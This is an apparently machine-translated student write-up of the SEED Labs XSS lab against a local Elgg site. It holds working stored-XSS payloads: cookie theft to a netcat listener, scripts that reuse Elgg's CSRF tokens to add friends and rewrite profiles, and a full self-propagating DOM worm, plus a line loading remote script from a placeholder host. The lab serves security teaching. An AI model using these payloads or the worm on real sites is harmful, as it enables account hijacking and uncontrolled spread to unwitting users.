Seedlabs web security XSS experiment
preface
Experimental records of XSS
Tip: the following is the main content of this article. The following cases can be used for reference
Lab Tasks
1.1 familiar with "HTTP Header Live" tool
In this lab, we need to construct HTTP requests. Find out the acceptable HTTP requests in Elgg. It seems that we need to be able to capture and analyze HTTP requests. We can use a lab called seed Lab - cross site scripting attack lab 4 "HTTP Header Live" for this purpose. Before you begin to study this laboratory, you should familiarize yourself with using this tool. The guide section gives instructions on how to use this tool
1.2 publish malicious messages to display the alert window
The goal of this task is to embed a JavaScript program in the Elgg profile so that users can view your profile. The JavaScript program will be executed and an alert window will be displayed. The following JavaScript program will display the alert window:
<script>alert('XSS');</script>
If you embed the above JavaScript code into your configuration file (for example, in the brief description field), anyone who views your profile will see the alert window. In this case, the JavaScript code is short enough to enter the short description field. If you want to run a long JavaScript, but you are limited by the number of characters you can type in the form. You can store the JavaScript program in a separate file and use js extension, and then reference it with the src attribute in the < script > tag. See the following example:
<script type="text/javascript" src="http://www.example.com/myscripts.js"> </script>
solution
Enter Docker and insert the Script code into the configuration file
docker ps docker exec -it id /bin/bash
Insert the previous < script > alert ('XSS')</ script>
echo "<script>alert('xss')</script>" >> index.html
It is worth noting here that the hosts are configured as described in the pdf
One item is missing and needs to be added:
10.9.0.5 www.seed-server.com
Then we log in to the site normally, such as samy
Next, insert XSS in the profile and save it
Then go back to your home page
1.3 publishing malicious messages to display cookies
Go back to the edit page and replace the xss code in alert with document cookie
1.4 stealing cookies from the victim's machine
nc listens on port 5555, and xss sends cookies to its own IP: 10.9.0.1
After listening is enabled here, we launch XSS attack
Get data
1.5 become a friend of the victim
The Elgg site is the same as the previous CSRF. How to find the interface to add friends and their own ID has been written in the CSRF experiment, which will not be repeated here.
After obtaining the interface, you need to insert JavaScript code into about me in the personal center. All those who visit you will trigger code calls to add samy as a friend's interface
<script type="text/javascript">
window.onload = function () {
var Ajax=null;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
//Construct the HTTP request to add Samy as a friend.
var sendurl="http://www.seed-server.com/action/friends/add?friend=59"+ts+token;
//Create and send Ajax request to add friend
Ajax=new XMLHttpRequest();
Ajax.open("GET", sendurl, true);
Ajax.send();
}
</script>
After saving, all visitors will trigger this code, and we can log in with Alice
There is no samy at present, and then visit samy in the new EST column
Alice doesn't do anything. Go back to the friends page
You can see that XSS has been executed and friends have been added successfully
1.5.1 explain the purpose of ts and token lines and why they are needed?
The site has a CSRF defense mechanism. When users visit the page, there is a token value issued by the server. It is not enough to directly construct the url for adding friends, because they don't know the other party's token, but only visit http://www.seed-server.com/action/friends/add?friend=59 , is not enough. See CSRF experiment for details
1.5.2 if Elgg application only provides editing mode for "about me" field and cannot switch to text mode, can you still launch a successful attack?
There are many attack points, such as Brief description, Location, Interests and other fields, which can be injected with Script code
1.6 modify the victim's profile
First, log in with your own account (same) to view the request package for modifying data
It can be seen from the above that the interface address is: http://www.seed-server.com/action/profile/edit
Submit data in post mode
Build a Script
<script type="text/javascript">
window.onload = function(){
//JavaScript code to access user name, user guid, Time Stamp __elgg_ts
//and Security Token __elgg_token
var userName=elgg.session.user.name;
var guid=elgg.session.user.guid;
var ts=elgg.security.token.__elgg_ts;
var token=elgg.security.token.__elgg_token;
var updateMessage = "hahaha";
//Construct the content of your url.
var content="__elgg_token="+token+"&__elgg_ts="+ts+"&name="+userName+"&description=&accesslevel[description]=2&briefdescription="+updateMessage+"&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2&guid="+guid;
var sendurl="http://www.seed-server.com/action/profile/edit"; //FILL IN
var samyGuid = 59;
//Create and send Ajax request to modify profile
if(guid!=samyGuid){
//Create and send Ajax request to modify profile
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST", sendurl, true);
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);
} }
</script>
It should be noted that the token and other data are put in the Post this time.
Then login to Alice's account
Then visit samy
Then Alice refreshes the personal center
profile modified successfully
1.6.1 why is there an if judgment in the above JavaScript attack code
- In samy's profile about me, JavaScript code is inserted. After submitting successfully, if samy visits his home page, this code will also be triggered. The about field of this code is empty, but the contents of other fields are modified. Therefore, as long as samy visits his home page, the injected script code will be modified to be empty, If others visit samy later, the attack will not be triggered
- if judgment, let the code judge the guid of the current user. if it is same, the attack will not be executed
1.7 writing an autobiographical XSS worm
In fact, it has been almost said in 1.6.1 that the constructed code has no script code in about. Therefore, self propagating virus means that when modifying the profile, the same code should be put in about, then this code will always exist, and all visitors will add attack code in their own about field
1.7.1 link worm
1. After capturing the package, it is found that the field name of about is description, which will be used in 1.7.2
2. Load js code xsscode remotely
<script src = "http://xxx.xxx.xxx.xxx"/xsscode.js>
Skip here first, because it's mainly about DOM worms. DOM will be more difficult. If you understand DOM type, Link type will naturally be. The topic of the laboratory also requires that the DOM type must be completed.
In fact, Link is to put the DOM worm code on a third-party server (which can be a self built site), and then load the script src, which saves a lot of things
1.7.2 DOM worm
DOM type worm constructs a JS by itself, then copies itself and passes it to the description field
This does not need to contact the external js, and name yourself a node: id=handleMessage, js to get the code in the node, then splice the script tags before and after, and assign the value to description. Just like the function in the code calls itself circularly, you can't create a function several times after several cycles, just call yourself~~
<script id="handleMessage">
var headerTag = "<script id=\"handleMessage\" type=\"text/javascript\">";
var jsCode = document.getElementById("handleMessage").innerHTML;
var tailTag = "</script>";
var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);
window.onload = function(){
var userName=elgg.session.user.name;
var guid=elgg.session.user.guid;
var ts=elgg.security.token.__elgg_ts;
var token=elgg.security.token.__elgg_token;
var updateMessage = "hahaha";
var content="__elgg_token="+token+"&__elgg_ts="+ts+"&name="+userName+"&description="+wormCode+"&accesslevel[description]=2&briefdescription="+updateMessage+"&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2&guid="+guid;
var sendurl="http://www.seed-server.com/action/profile/edit";
var samyGuid = 59;
if(guid!=samyGuid){
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST", sendurl, true);
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
Ajax.send(content);
Ajax=null;
sendurl="http://www.seed-server.com/action/friends/add?friend=59"+"&__elgg_token="+token+"&__elgg_ts="+ts;
Ajax=new XMLHttpRequest();
Ajax.open("GET", sendurl, true);
Ajax.send();
}
}
</script>
preservation
Next, log in with Alice's account and visit Samy's home page
View your home page and profile details
The code is also unknowingly inserted into About me
Sam was also added as Alice's friend
Now start to verify that the worm has spread to Alice, and other people who visit Alice will also be infected. Modify the profiles of other visitors and put the XSS worm code in their About me to continue to spread
Login with Charlie account
Visit Alice again
Go back to Charlie's Profile and see that it has been modified successfully
See if your friends have been added
DOM worms are completed. They can copy and spread themselves, and add Samy as a friend with exponential growth